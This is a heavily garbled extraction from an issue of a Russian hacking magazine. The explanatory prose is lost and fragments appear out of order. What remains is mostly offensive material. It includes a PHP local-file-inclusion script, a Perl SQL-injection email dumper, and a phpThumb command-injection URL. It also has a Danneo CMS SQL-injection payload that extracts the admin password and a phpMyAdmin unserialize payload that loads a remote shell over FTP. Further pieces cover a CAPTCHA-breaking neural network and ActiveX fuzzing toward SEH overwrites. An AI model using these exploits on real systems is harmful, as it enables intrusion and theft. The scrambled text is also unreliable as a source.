$cmd = '<?php ' . $cmd . ' ?>';
$request = "POST /" . $script . "php://input" . " HTTP/1.1\
r\n";
$request .= "Accept-Language: en\r\n";
$request .= "Content-Type: application/x-www-formurlencoded\r\n";
035
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;

Windows NT 5.1; MyIE2)\r\n";
$request .= "Host: " . $host . "\r\n";
$request .= "Content-length: ". strlen($cmd) . "\r\n";
$request .= "Connection: Keep-Alive\r\n";
$request .= " Cache-Control: no-cache\r\n";
$request .= "\r\n";
$request .= $cmd . "\r\n";
$socket = fsockopen($host, $port ? $port : 80);
fputs($socket, $request);
:
SQL-
: , . ,
.
#!/usr/bin/perl
use LWP::Simple; # LWP::Simple http
open(FH,">dump.txt"); #
$lim=0; # $lim limit
while(1) { #
$url="http://www.example.com/profile.php?id=-1+union+sele
ct+concat('c0de',email,'ed0c')+from+users+limit+$lim,1";
# SQL-,
e-mail ,
$content = get("$url"); # get(),

if($content =~ m/c0de(.*)ed0c/) { # c -
:
:
, r57, c99 .
find . -perm -2 -type -d -ls
.
,
, , .
: ,
: ,
, ?
/tmp.
.
1. phpinfo() . session.save_handler. files , ,
session.save_path. Local Value,
( ), .htaccess.
036
while(!feof($socket)) echo fgets($socket, 1024);

fclose($socket);
}
?>
3. :
http://localhost/input.php?host=www.example.
com&script=index.php?page=&cmd=phpinfo()
4. :).
email
print FH $1."\n"; #
$lim++; # $lim
} else { #
print 'Total dumped ' . $lim; # exit; #
}}
! ,
, .
dump-
, .
find . -user www -type d -ls , www
find . -user www -perm /222 -type d -ls ,

find . -group www -type d -ls ,
www
find . -perm -a+w -type d -ls ,
(, dr-xr-xrwx)
find . -perm -2
-type -d -ls, drwxrwxrwx ,
rwx
Master Value , ,
php.ini.
2. .htaccess, php_value
session.save_path.
3. .
, .
/tmp/
/php_sess/
/tmp/phpsess/
/tmp/php/
/tmp/php-sess/
/home/%username%/tmp/
X 04 /135/ 10
/var/phptemp/
/var/phptmp/
/var/phpsess/
/var/php-sess/
/var/lib/php/
/var/lib/php/session/
/var/lib/php3
/var/lib/php3/session/
/var/lib/php4/
/var/lib/php5/
/var/lib/php6/
: HTTPD.CONF
:
,
? , . ,
apache, init-, /etc/init.d/
bash- . :
pname=apache2
: ${sysconfdir:=/etc/$pname}
: ${apache_link:=/usr/sbin/httpd2}
: ${sysconfig_apache:=/etc/sysconfig/$pname}
:
WINLOCK,
SMS-.
:
, ( ).
, ,
, ( ). ,
(
, -,
..).
, , , ,
,
:).
(
, 300-600 ).
:
1. , (support.kaspersky.ru/viruses/
deblocker) . ,
, (c:\
windows\temp, Temp

Sandboxie Temporary Internet Files, c:\documents and settings\
:)
_\Local Settings).
,
System Volume Information,

,
.
2. LiveCD-,
(freedrweb.
X 04 /135/ 10
/var/lib/php6/
session/
/www/phpsession/
C:\Temp
C:\WINDOWS\Temp
C:\PHP\
sessiondata
phpinfo()
: ${pidfile:=/var/run/httpd2.pid}
: ${logdir:=/var/log/$pname}
httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf}
/etc/apache2/httpd.conf.
( )
-
messages,
.

locate httpd.conf
phpinfo()
.
com/livecd), BIOS ,
LiveCD . Live- Windows CureIt
( ERD Explorer, . .).
3. ,
( freedrweb.
com/cureit).
4. , , , :
<Win+R>, gpedit.msc.

.
, Ok. . ,
,

Ctrl-Alt-Del.
regedit.exe, . HKEY_
CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\
DisableTaskMgr .
5.
, , (Default),
:
HKEY_CLASSES_ROOT\exefile\shell\open\command
HKEY_CLASSES_ROOT\exefile\shell\runas\command
"%1" %*.
. ,
, wuauclt.exe /
detectnow, . , .
, LiveCD-, . ,
, virustotal.com. z
037

icq 884888, http://snipper.ru
, ! ,
. , ,
!
Bugzilla
Bugzilla advisory
01
02
BRIEF Gnome-screensaver
GNOME, , ,
openSUSE
. (
2.28.2 )
, , ,
.

.
BRIEF phpThumb (phpthumb.sourceforge.net/)

PHP (, , Plogger TinyEditor),

GIF, JPEG, PNG, BMP, ICO.
PHP- GD,
ImageMagick,
*nix .
, , , PHP passthru, system,
shell_exec, exec ( )
. phpThumb
, ,
ImageMagick GD.
, ./phpthumb.functions.php
, :

GNOME-SCREENSAVER
, dk_
window_begin_implicit_paint() ( GTK+),
-
:)
EXPLOIT (
) - vigilance.fr:
1. (
);
2. ;
3. ;
4. ,
.

Enter, , ,
.
TARGETS gnome-screensaver <=2.28.2
SOLUTION ( 2.28.3)
live.gnome.org/GnomeScreensaver/.
038
PHPTHUMB
function SafeExec($command) {
$AllowedExecFunctions = array('shell_exec'=>true,
'passthru'=>true, 'system'=>true, 'exec'=>true);
foreach ($AllowedExecFunctions as $execfunction => $is_

allowed) {
switch ($execfunction) {
case 'passthru':
case 'system':
ob_start();
$execfunction($command);
$returnvalue = ob_get_contents();
ob_end_clean();
break;
case 'exec':
X 04 /135/ 10
sql Danneo
CMS
SHELLCODE'A ,

ASCII
$output = array();
$lastline =
Danneo CMS
$execfunction($command, $output);
$returnvalue = implode("\n", $output);
break;
case 'shell_exec':
ob_start();
$returnvalue = $execfunction($command);
ob_end_clean();
break;
}

PHP
(, , , disable_functions
, , , passthru).
,
.
. phpThumb,
.
phpthumb.class.php:
function ImageMagickThumbnailToGD() {
X 04 /135/ 10
foreach ($this->fltr as $filterkey => $filtercommand) {

@list($command, $parameter) = explode('|',
$filtercommand, 2);
//, ImageMagick
switch ($command) {
case 'blur':
if ($this->ImageMagickSwitchAvailable('blur')) {
@list($radius) = explode('|', $parameter);
$radius = ($radius ? $radius : 1);
$commandline .= ' -blur '.$radius;
unset($this->fltr[$filterkey]);
}
break;
$this->DebugMessage('ImageMagick called as
('.$commandline.')', __FILE__, __LINE__);
$IMresult = phpthumb_functions::SafeExec($commandline
);
$this->DebugMessage('ImageMagick failed with message

('.trim($IMresult).')', __FILE__, __LINE__);
039
gnome-screensaver
:
$radius, $commandline, SafeExec();
- DebugMessage()
.
, ImageMagick
( blur"):
site.com/phpThumb.php?fltr[]=blur|5
- (
1 9, ):
http://site.com/phpThumb.php?phpThumbDebug=9
,
,
phpThumb.
EXPLOIT , . , ,
,
. *nix
:
http://site.com/phpThumb_1.7.9/phpThumb.
php?src=/home/site.com/public_html/kartinka.
040
SVN gnome-screensaver-svn
jpg&fltr[]=blur|5 -quality 75 -interlace line /

home/site.com/public_html/kartinka.jpg" jpeg:"/
home/site.com/public_html/kartinka.jpg" ; [_] ;&phpThumbDebug=9
, . ,
Windows http://snipper.ru/view/8/
phpthumb-179-arbitrary-command-execution-exploit.
TARGETS phpThumb <= 1.7.9

SOLUTION
ImageMagick GD
phpThumb:
X 04 /135/ 10
phpThumb
$PHPTHUMB_CONFIG['prefer_imagemagick'] = false;
PHP
disable_functions.
03
DANNEO CMS <= 0.5.2 SQL INJECTION

VULNERABILITY
BRIEF CMS Danneo ,

. : SEO
friendly , , , , , - ..
Inj3ct0r (
milw0rm.com ) CMS SQL-.
.
, ./mod/poll/comment.php:
$comtext=($setting['peditor']=="yes") ?
commentparse($comtext) : deltags(commentparse($comtex
t));
$comname = (preparse($usermain['logged'],THIS_INT)==1
&& preparse($usermain['userid'],THIS_INT)>0) ?
$usermain['uname'] : substr(deltags($comname),0,50);
$comtitle = substr(deltags($comtitle),0,255);
$in = $db->query("INSERT INTO .$basepref."_polling_
X 04 /135/ 10
phpThumb
comment VALUES
(NULL,'".$id."','".$usermain['useri
d']."','".NEWTIME."',
'$comname','$comtitle','$comtext','".
REMOTE_ADDRS."')");
, $comtitle 255 ,
( -
041
WordPress
\', \ ")
$comtext. ,
./base/danneo.track.php, , , :
$baddata = array("UNION",
"OUTFILE",
"FROM",
"SELECT",
"WHERE",
"SHUTDOWN",
"UPDATE",
"DELETE",
"CHANGE",
"MODIFY",
"RENAME",
"RELOAD",
"ALTER",
"GRANT",
"DROP",
"INSERT",
"CONCAT",
"cmd,
"exec",
"--"
);
foreach($_REQUEST as $params => $inputdata){
foreach($baddata as $badkey => $badvalue){
if(is_string($inputdata) &&
eregi($badvalue,$inputdata)){ $badcount=1; }
}
}
][ , , ,
, ereg[i]
-,
$comtext, -
042
42
. Danneo, ./
base/danneo.function.php:
if(!ini_get("register_globals") || (@get_cfg_
var('register_globals')==1)){
//@import_request_variables('GPC');
@extract($_COOKIE,EXTR_SKIP);
@extract($_POST,EXTR_SKIP);
@extract($_GET,EXTR_SKIP);
@extract($_REQUEST,EXTR_SKIP);
if(get_magic_quotes_gpc()) {
if($_POST) $_POST = stripslashesall($_POST);
if($_GET) $_GET = stripslashesall($_GET);
if($_REQUEST) $_REQUEST = stripslashesall($_REQUEST);
if($_COOKIE) $_COOKIE = stripslashesall($_COOKIE);
}
, magic_quotes
stripslashesall() (
, $comtitle
$comtext SQL- ),
- :)
EXPLOIT :
1. $comname , 5-10 ;
2. $comtitle 254 ( magic_
quotes = off, \");
3. $comtext /*[NULL BYTE]*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- POST- :
comname=lololo&comtitle=[254 ]'&comtext=/*\
x00*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)--&id=[ID ]&ajax=0&re=comment
, SQL-
:
X 04 /135/ 10
WordPress
INSERT INTO dn052_polling_comment VALUES (NULL,'1','0',

'1230987393','lololo','[254 ]\','/*\0*/, (SELECT
adpwd FROM dn052_admin LIMIT 1), 1)-- -','127.0.0.1')
.
http://www.inj3ct0r.com/
exploits/11004.
TARGETS Danneo CMS <= 0.5.2

SOLUTION
, Danneo
CMS http://danneo.com/down/view/CMS.html.
04

WORDPRESS
BRIEF ,
, WordPress,
.
, 2.9 (trash) . , - ,
, ,
,
.
, , ,
.
./wp-includes/query.php, , publish:
if ( ('publish' != $status) ) {
if ( ! is_user_logged_in() ) {
// User must be logged in to view unpublished
posts.
$this->posts = array();
} else {
if (in_array($status, array('draft', 'pending'))
){
, :
1. ;
2. draft pending,
trash .
EXPLOIT , ,
trash- advisory http://tmacuk.co.uk/?p=180.
TARGETS WordPress 2.9, 2.9.1
X 04 /135/ 10
SOLUTION ,
http://wordpress.org/download.
05
BUGZILLA
BRIEF
Bugzilla -, (,
https://bugzilla.mozilla.org).
,

.
,
.htaccess, ,
,
.
process_bug.cgi ( 249 ):
foreach my $group (@{$bug->product_obj->groups_valid})
, $bug->product_obj"
,
,
,
. , ,
, .
EXPLOIT
:
1. CVS/,
contrib/, docs/en/xml/, t/" old-params.txt,
;
2. ,
,
( ),
.
advisory
bugzilla.org/security/3.0.10.
TARGETS
: Bugzilla < 3.0.11, < 3.2.6, < 3.4.5, <3.5.3
: Bugzilla 3.3.1 3.4.4 3.5.1, 3.5.2
SOLUTION Bugzilla
: http://www.bugzilla.org/download (
.htaccess

). z
043

primat.isu@gmail.com
DVD
dvd
,

xakep.ru,

,

.
2.0
,
.

,
,
. CAPTCHA Completely Automated Public Turing test
to tell Computers and Humans Apart.

.
044
, . ,
,
. -,
, ,
(
LiveJournal). .
, , . ,
,
, ,
30
90%, .
1000 $1, .
, , ,
( -), , , .
X 04 /135/ 10
,
.
, -
.
,
. ,
.
,
, , . ,
. PageRank ,
, ,
.
,
, , .
,
-. , 1%, ,
100 .

. , 6 ,
(10 + 26) ^ 6 2
., .
, ,
, , , 10 .
,

. ( ?),
. ,

.
: , .
,
,
. ,
,

. ,
,
. ,
X 04 /135/ 10
4 (16x24 )

, .
,
- . ,
, . - .
, , . xakep.ru,

. , 10000
, .
, , , .

: , ,
, . ,
, .
,
, -, , -,
.
5% . , 20-
.

. .

. , 100 .
,
,
,
.
, . ,
, ,
(,
2716.jpg). , PHP Python,
Matlab,
. PHP,
image, imagecolorat. , ,
,
:
class Xakep_CAPTCHA
{
//
045
""
protected function colordist($color1, $color2)
{
return sqrt(pow((($color1 >> 16) & 0xFF)
- (($color2 >> 16) & 0xFF), 2)
+ pow((($color1 >> 8) & 0xFF)
- (($color2 >> 8) & 0xFF), 2)
+ pow(($color1 & 0xFF)
- ($color2 &
0xFF), 2));
}
// , ,

// 200
protected function update_mask()
{
$this->mask = array();
for ($i = 0; $i < $this->width; $i++)
for ($j = 0; $j < $this->height; $j++)
$this->mask[$i][$j] = $this->colordist
(imagecolorat($this->image, $i, $j),
$this->bg_color) > 200 ? 1 : 0;
}
, -,
, , -,
.
, ,
.
.
xakep.ru (~19 )
(16x24 ) . , , .
,
.
.

, .
( )
.

046
, (
). ,
4 ,
,
,
. : x, y (
) d
.
, .
, ,
,
. :

( ).
,
( ).
,
.
,
,
.
, . ,
(,
).

() ,
. ,
. ,
..
x, y d, .
:
//
public function test_dna($array)

{
$fitness = 0;
for ($d = 0; $d < $this->digits_quantity; $d++)
for ($i = 0; $i < $this->digit_width; $i++)
for ($j = 0; $j < $this->digit_height; $j++)
{
//
(x, y) (d)
$x = $this->digit_kerning * $d + $i +
$array['x'] + round($array['d'] * ($j / $this->digit_
height));
$y = $j + $array['y'];
$fitness += $this->mask[$x][$y];
}
return $fitness;
}
X 04 /135/ 10

,
, .
.
90%
- . 4
(16x24 ):
protected function divide_digits($params)
{
$this->digits = array();
for ($i = 0; $i < $this->digits_quantity; $i++)
{
//
$this->digits[$i]['image'] =
imagecreatetruecolor($this->digit_width,
$this->digit_height);
$this->digits[$i]['width'] = $this->digit_width;
$this->digits[$i]['height'] = $this->digit_height;
for ($x = 0; $x < $this->digit_width; $x++)
{
for ($y = 0; $y < $this->digit_height; $y++)
{
// , ""
$d = round($params['d'] * ($y / $this->digit_
height));
$co lor = imagecolorat($this->image, $x +
$this->digit_kerning * $i + $d + $params['x'], $y +
$params['y']);
imagesetpixel($this->digits[$i]['image'], $x, $y,
$color);
}
}
}
}

.
, .
, .
(
X 04 /135/ 10
). . ,
0 1.
:
. ,
. (feedforward ),
( )
().
( )
(, ).

: , .
. , , ,
,
.
,
Fast Artificial Neural
Network (www.leenissen.dk/fann). ,
. :
//
// :
// 1.
// 2. (1 )
// 3.
$ann = fann_create(array(384, 150, 10), 1, 0.7);
//
// :
// 1.
// 2. (, ,
)
// 3.
// 4.
// 5. ,
fann_train($ann, $set, 10000, 0.001, 100);

// $input
$output = fann_run($ann, $input);
//
fann_save($ann, 'ann.data');
//
$ann = fann_create('ann.data');

384, 150 10 .
() (1624
= 384) , 0 1 ( ), , 10
0 1, :
, , .
, , ,
,
.
,
047

RAZ0R HTTP://RAZ0R.NAME
, :
function train()
{
$dir = "samples/";
$set = array();
if ($dh = opendir($dir))
{
while (($file = readdir($dh)) !== false)
{
if (filetype($dir.$file) == 'file')
{
$answer = str_replace('.jpg', '', $file);
$xc = new Xakep_CAPTCHA($dir.$file,
'ann.data', 4, $answer);
$out = $xc->parse();
$set []= $xc->sample;
}
}
closedir($dh);
}
$ann = fann_create(array(384, 150, 10), 1, 0.7);
fann_train($ann, $set, 10000, 0.001, 100);
fann_save($ann, 'ann.data');
}
100 43% ,
3% (0.43 ^ 4), .
100 , 55% 10% . ,
1-2
,
10-20 . , , ,

. :
function test()
{
$dir = "test/";
$c = 0;
$wins = 0;
{
048

{
if (filetype($dir.$file) == 'file')
{
$xc = new Xakep_CAPTCHA($dir.$file,
'ann.data', 4);
$out = $xc->parse();
if ($out == str_replace('.jpg', '', $file))
$wins++;
print '<img src="http://localhost/
xakep_captcha/test/'.$file.'"> '.$out.'<br><br>';
flush();
$c++;
}
}
closedir($dh);
}
print $wins.'/'.$c;
}
, ,
, .
,
, . xakep.ru
? -, , ,
. -, ,
,
. -,
6,
.
. , , , ,
SMS ( Google ).
, ,
. ,
,
OpenID-, .z
X 04 /135/ 10

RECAPTCHA
,
,

reCAPTCHA (recaptcha.net). reCAPTCHA

. ,

,
. ,
, , ,
. reCAPTCHA ,
,
,
.. OCR-. ,
reCAPTCHA
, . reCAPTCHA
,

.

(ocr-research.org.ua)
. ,

,
.
-,

( ). -,
X 04 /135/ 10
,
, ,
. ,

. ,
,
.
.
,
,
.

mail.ru.

.

.

.
, ,
,
: ,
.

.
, ,

, .

.
:
,

. ,
, mail.ru
.

(
brightcove.newscientist.com/services/player/
bcpid2227271001?bctid=47814603001).
(,
) ,

.
.

,
.

,
. ,
,
.

,

,

. ,
(
),
.
,
.
049

icq 884888, http://snipper.ru
UNSERIALIZE

, ! ][
PHP
. ,
unserialize .
,
, -
.
!
Piwik phpMyAdmin.
PIWIK
Piwik.
, Piwik -, Google analytics.
phpMyVisites (phpmyvisites.us).
: ( WordPress), API (
xml, json, php, csv),
, ( drag and drop-), , real time-
- (
250 ).
, Piwik
sourceforge.net "Infoworld Bossie Award"
. ,
unserialize Piwik.
ZEND FRAMEWORK
,
PHP- Zend
Framework , ,
unserialize().
, Piwik - :)
,
050
( 0.4.5
).
./core/Cookie.php :
protected function loadContentFromCookie()
{
$cookieStr = $_COOKIE[$this->name];
$values = explode(
self::VALUE_SEPARATOR, $cookieStr);
foreach($values as $nameValue){
...
if(!is_numeric($varValue)){
$varValue = base64_decode($varValue);
// some of the values may be serialized
array so we try to...
if(($arrayValue=@unserialize($varValue))
!==false
// we set the unserialized version only
for arrays...
&& is_array($arrayValue)
)
{
$varValue = $arrayValue;
}
...
}
X 04 /135/ 10
advisory phpMyAdmin
phpMyAdmin
HTTP://WWW
links
, , , :
"=",
, ;

base64_decode() (, ,
-)
unserialize().

(, )
, Zend Framework.
:)
PDF ,
,
Zend_Log.
./libs/Zend/Log.php
:
public function __destruct()
{
foreach($this->_writers as $writer) {
$writer->shutdown();
}
}

shutdown() , _writers.
shutdown-.
./libs/Zend/Log/Writer/Mail.php:
public function shutdown()
{
...
if (empty($this->_eventsToMail)) {
return;
}
...
if ($this->_layout) {
...
// If an exception occurs during
rendering, convert it to a notice
// so we can avoid an exception
thrown without a stack frame.
try {
$this->_mail->setBodyHtml($this->_
layout->render());
} catch (Exception $e) {
...
try {
$this->_mail->send();
} catch (Exception $e) {
...
X 04 /135/ 10
}
...
}
- , ,
e-mail. , .
unserialize-.
-, ,
,
:).
, render.
Piwik_View
./core/View.php:
public function render()
{
try {
...
} catch(Exception $e) {
// can fail, for example at
installation (no plugin loaded yet)
}
...
return $this->smarty->fetch($this>template);
}
,
, ,
Smarty .
SMARTY
, Smarty PHP- , .
, fetch() ./libs/
Smarty/Smarty.class.php:
function fetch($resource_name, $cache_id =
null, ...)
{
...
if ($display && !$this->caching &&
count($this->_plugins['outputfilter']) ==
0) {
if ($this->_is_compiled($resource_
name, $_smarty_compile_path)
|| $this->_compile_
resource($resource_name, $_smarty_compile_
path))
{
include($_smarty_compile_path);
piwik.org Piwik
builds.piwik.org/?
C=M;O=D
Piwik
suspekt.org/2009/
12/09/advisory032009-piwikcookie-unserializevulnerability Piwik
Cookie unserialize()
Vulnerability
framework.zend.
com/download
Zend Framework
smarty.net

Smarty
php.net/call_user_
func_array call_
user_func_array()
suspekt.org/
downloads/Piwik_
Smarty.txt
Piwik
Smarty
suspekt.org/
downloads/Piwik_
Config.txt
Piwik
gnucitizen.org/
static/blog/2009/06/
phpmyadminrcesh.
txt phpMyAdmin '/
scripts/setup.php'
PHP Code Injection
RCE PoC v0.11
snipper.ru/view/12/
phpmyadmin2119-unserializearbitrary-php-codeexecution-exploit

phpMyAdmin <= 2.11.9
forum.antichat.ru/
thread99589-file_
exists.html
file_
exists ftp
051
Piwik
timestamp
advisory
}
} else {
...

_compile_resource :
function _compile_resource(
$resource_name,
$compile_path)
{
$_params = array('resource_name'
=> $resource_name);
if (!$this->_fetch_resource_
info($_params))
{
return false;
}
_fetch_
resource_info
:
function _fetch_resource_info(
&$params)
{
...
switch ($_resource_type) {
case 'file':
...
break;
default:
// call resource functions
to fetch the template source and
052
if ($params['get_source'])
{
$_source_return =
isset($this->_plugins['resource']
[$_resource_type]) && call_
user_func_array($this->_
plugins['resource'][$_resource_
type][0][0], array($_resource_
name, &$params['source_content'],
&$this));
...
}
! PHP-
call_user_func_array
callback- :).
call_user_func_
array :
callback-
,
.
PHP :
1. eval(), ,
, ,
call_user_func_array;
2. assert() ( eval)
, ,
3 ,
assert .
-
,
Smarty eval:
function _eval(
$code, $params=null)
{
return eval($code);
}

2 ,
.
,
PHP,
,
.
,
(
).

,

base64_encode , , evil-,

PHP- Piwik.

,
unserialize

.
PHPMYADMIN
:).
,
, ,

MySql phpMyAdmin
2.11.9 ( , ,
). ,
./scripts/setup.php
,
. ,
,
./config
( ),
.
.
, ./scripts/setup.php
,
unserialize:
if (isset($_POST['configuration'])
&& $action != 'clear')
{
// Grab previous
configuration, if it should not
be cleared
$configuration=unserialize(
$_POST['configuration']);
}
, $_
POST['configuration']
unserialize() ,

__wakeup __destruct.
- ./libraries/Config.
class.php:
function __wakeup() {
if (! $this->checkConfigSource()
X 04 /135/ 10
, phpinfo() Piwik
|| $this->source_mtime !==
filemtime($this->getSource())
|| $this->default_source_mtime !==
filemtime($this->default_source)
|| $this->error_config_file
|| $this->error_config_default_file) {
$this->settings = array();
$this->load();
$this->checkSystem();
}
...
}
,
load().
:
function load($source = null)
{
...
if (! $this->checkConfigSource()) {
return false;
}
...
if (function_exists('file_get_contents'))
{
$eval_result = eval('?>' .
trim(file_get_contents(
$this->getSource())));
} else
{
$eval_result = eval('?>' .
trim(implode("\n",
file($this->getSource()))));
}
...
}
, eval-,
PHP-
:).
getSource checkConfigSource:
function getSource() {
return $this->source;
}
...
function checkConfigSource() {
...
if (! file_exists($this->getSource()))
{
...
return false;
}
if (! is_readable($this->getSource())) {
X 04 /135/ 10
:)
...
die('Existing configuration file (' .
$this->getSource() . ') is not readable.');
}
...
$perms = @fileperms($this->getSource());
if (!($perms === false) && ($perms & 2))
{
...
die('Wrong permissions on configuration
file, should not be world writable!');
}
return true;
}

, , , . file_exists(), is_readable() fileperms()
file_get_contents() URL PHP . . PHP 5,
ftp, file_exists('ftp://ftp.com/
shell.txt') true. http
. ,
,
unserialize, $_POST['configuration']
( "source"):
INFO
info

Raz0r' raz0r.
name/obzory/novyesposoby-obxoda-wafi-php-eksploity.

unserialize-

vBulletin, ,
,

.
O:10:"PMA_Config":1:{s:6:"source";s:70:"ft
p://login:password@tvoy_host.com/www/shell.
txt";}
phpinfo(), shell.txt
ftp- "<? phpinfo();exit; ?>"
(exit; , "Fatal
error").
.
EPIC WIN
, , PHP,
, ! .
( :)

. , ,
unserialize-
,
. ! z
053

d0znpp http://oxod.ru
,

-

-,
.
,

. , ,

.

CMS, ,
. .

.
,
,
.
, ,
-,
. ,
,
, .
.

,
max_execution_time
500- . -,

.
(

054
TIFF), .

11 ,
. ,
,
.

Register_Globals=ON.
,
,
,
.
PHP

.
PHP :
max_execution_time
max_input_nesting_level
max_input_time
memory_limit
pcre.backtrack_limit (PHP>=5.2.0)
pcre.recursion_limit (PHP>=5.2.0)
post_max_size (PHP>=4.0.3)
upload_max_filesize
max_file_uploads (PHP>=5.2.12)
, , common :).
( )
php.net/manual/en/ini.list.
php. max, limit.
. ,
, :
,
PHP -.
,
, ,
max_execution_time,
memory_limit.
error_reporting=E_
ERROR , display_errors=On.
X 04 /135/ 10

GET.
max_input_nesting_
level.
max_execution_time
. , ,

.
, , ,
.
, .
64. ,
, .
:
URI MAX LENGTH

MAX_INPUT_NESTING_LEVEL

GET
. , .
, ( ). PHP
:
function fuzz_max_uri_len($url)
{
$headers = array();
$data = array();
$left = 500; //
$right = 64000;//

$accur = 5;//,
while (($right-$left) > $accur){
$cur = ($right+$left)/2;
$data['x'] = str_repeat("x",$cur);
list($h,$c,$t) = sendGetRequest($url,
$headers, $data);
$s = intval(substr($h,9,3));
if ($s<400) {
$left=$cur;
}
else{
$right=$cur;
}
echo "\n$cur\t$s";
}
return(($right+$left)/2);
}
max_input_nesting_level
,
X 04 /135/ 10
<?php echo $_GET[a]; ?>.
, , max_input_nesting_level=1 ?a[][], ,
Notice,
, .
2
, Array. ,
,
-
, ,
Array. -
. ,
,
, .
,
:). ,
.
-
,
. PoC
, ,
. ,
.
,

.
HTTP://WWW
links
oxod.ru ,
,
.
php.net , .

:)

Allowed memory size exhausted. , PHP- <?php echo OK;?>.
, ?!
, . ,
, , .
PHP
055
}
}
return intval($mem);
}
GET. , :)

,
, . ,
,
. ,
?a([]x2500 )
1.2 . , ,
, memory_limit,
.
,
:
PoC . ,
,
. 20 .
memory_get_usage().
.
, a
GET. -
1 .
, ,
?a=aaa,
.

GET- (
).
?a[],
500 .
,
max_input_nesting_level.
056
<?php echo marker:.memory_get_

usage().#; ?>
auto_append_file
php.ini. ,

. :
function findMarker($content)
{
$p1 = strpos($content,
"ONsec E500 mem:");
if ($p1===false){
return 0;
}
else {
$p2=strpos($content,"#",$p1);
if ($p2===false){
return 0;
}
else {
$mem = substr($content,
$p1+15,$p2-$p1-15);

.
. ,
,
, .
, .
, POST,
.
PoC
fuzz_memory_usage().
(POST,GET,Multipart)
.

, ,
, .
,

,
, . ,
max_execution_time, .
OWASP,
dead_code. ,
, ,
. ,
-
, ,
, . ,
, . ,
.
, .
,
, .
, ,
,
. -
,
,
. , ,
, ,
, .
,
. ,
,

, . ,
,
-.

X 04 /135/ 10

GET .
PoC. 30 83
, 126 .
GET .
.
, :
1. , ,
(16^3=4096).
2. , .
3. 250 ,
, . .
,

. Multipart, . -,
, .
20 , , .
foreach($results as $key=>$value){
if ($value['path']==$path){
$unique=false;
break;
}
}
if ($unique){
$len = $p3-$p2;
$res = array('path'=>
substr($filedata,$p2,$len),'len'=>$fsize);
$results[$i]=$res;
$i++;
}
}
}
fclose($fh);
}
closedir($dh);
$size=count($results)-1;
//
for ($i = $size; $i>=0; $i--) {
for ($j = 0; $j<=($i-1); $j++)
if ($results[$j]['len']>$results[$j+1]['len']) {
$k = $results[$j];
$results[$j] = $results[$j+1];
$results[$j+1] = $k;
}
}
return $results;

,
. :
function parseResults($dir)
{
if (is_dir($dir))
{
{
$i=0;
$results = array();
{
$curFile = $dir.$file;
$fh = fopen($curFile, 'r');
$filedata = fread($fh, filesize($curFile));
$fsize = filesize($curFile);
$p1 = strpos($filedata,"Maximum execution time of ");
if ($p1 === false) {}
else{
$p2 = $p1+52;
$p3 = strpos($filedata,"</b>",$p2);
if ($p3 === false) {}
else{
$len = $p3-$p2;
$path = substr($filedata,$p2,$len);
$unique = true;
//
X 04 /135/ 10
}
}
}
, .
, .
, 126 30 .
. ,
PoC !

. ,
, ,
. ,
, .
, PoC .
. , .
, .z
057

aka Don_Huan dookie@inbox.ru

ACTIVEX
ActiveX-
. 2006
,
.
ActiveX
COM- Microsoft , ,
DLL
OLE- OCX,
, , , .

HTML <object >,
CLSID. ,
JavaScript-
ActiveXObject(..),
ProgID. CLSID

{11111111-2222-33334444-555555555555}. ProgID , ,
CLSID. CLSID, ProgID COM- .

: HTML
ActiveX ,
( :
XSS
HTML-
..),
.

,
. :
,
058
,
,

. , ,
, ActiveX
,
,
. ,
, .
,
. ActiveX-
, , .

. , ActiveX CLSID {11111111-2222-3333-4444555555555555}.
,
HKEY_CLASSES_
ROOT\CLSID\{11111111-2222-3333-4444555555555555}
Implemented Categories (
, ,
).

,
.
{7DD95802-9882-11CF-9FA900AA006C42C4}
{7DD95801-9882-11CF-9FA900AA006C42C4}

,
.
, ,
KillBit. -
HKEY_LOCAL_
X 04 /135/ 10
ActiveX Acrobat Reader

MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{11111111-2222-3333-4444-555555555555}.
Compatibility Flags HEXe
0x00000400 KillBit.
.
, . ,
:
Object not safe for scripting
ActiveX? ,
.
IObjectSafety.

.
INTERFACESAFE_FOR_UNTRUSTED_
CALLER INTERFACESAFE_FOR_UNTRUSTED_DATA,

.
,
.
.
?
,
/++, , .
,
, . , .

Fuzzing-,
COMRaider [labs.idefense.com/
software/fuzzing.php]. , AXman
[digitaloffense.net/tools/axman/],
COMRaider, . ActiveX, .
, IE. , .
, .
,
, ActiveX. ,
,
, , .
. ,
,
.
fuzzing
,
X 04 /135/ 10

ExecuteCmd()?
, COMRaider.
,
COMRaider
FileMon RegMon. ,
, . COMRaider.
,
View .
Options , Edit
BuildArgs.vbs.
,
Visual Basic-. GetStrArgs(),
.
for i=100 to 10000 step 1000
parent.strs.add "String(" & i & ",
""A"")"
next
DVD
dvd
,

ActiveX, .

( !!!)
for i=10000 to 100000 step 10000

parent.strs.add "String(" & i & ",
""A"")"
next

100 10000 1000. 10000,
100000. 20
.
%s %n
.
:
parent.strs.add
parent.strs.add
parent.strs.add
""B"")"
parent.strs.add
""B"")"
"""C:\31337.txt"""
"""31337"""
"""http://""+String(10000,
"""C:\""+String(10000,
.
,
.
059
SEH !
heap spray
Start,
Scan a directory for registered COM servers.

. ,
, ,
.
. ,
.
, COMRaider
,

.
, FileMon
. , ActiveX,
060
heap spray
,
: %WINDIR%\Downloaded Program
Files. 5000 .
, ,
Bulid Obj Safety Report for Selected
COMRaider
. , .
.
.
. ,
. ,

.
,
, Internet Explorer .
Start Choose from controls that should be
loadable in IE.
.
FileMon RegMon 31337. ,

,
. ,
COMRaidere,

,
Scan Selected For Strings,
file
,path,url,key,load,download,safe,read,write,file,e
xecute .. ( ) . ,
, -

X 04 /135/ 10
FileMon
COMRaider
parent.strs.add """"&stri&"""" next

Fuzz Selected. COMRaider,
,
,
-.
Begin Fuzzing,
:).

, . , .

emsmtp.dll 6- . , , Oracle Document
Capture (10.1350) (oracle.
com/technology/software/products/contentmanagement/index_dc.html), .
, .
Caused Exception,
. , ,
,
, ,
. ,
, EIP
41414141,
, SEH .
,
. ,

.
OllyDBG (ollydbg.de).
COMRaider,

Launch in Olly.
, F9,
.
Olly
,
CMP,
[ESI+180] .
ESI A
X 04 /135/ 10
""

0x41414141, ,
0x41414141+0x180=0x414142C1
,
. ,
( ).
,
41,
SEH .
, ,
, ,
,
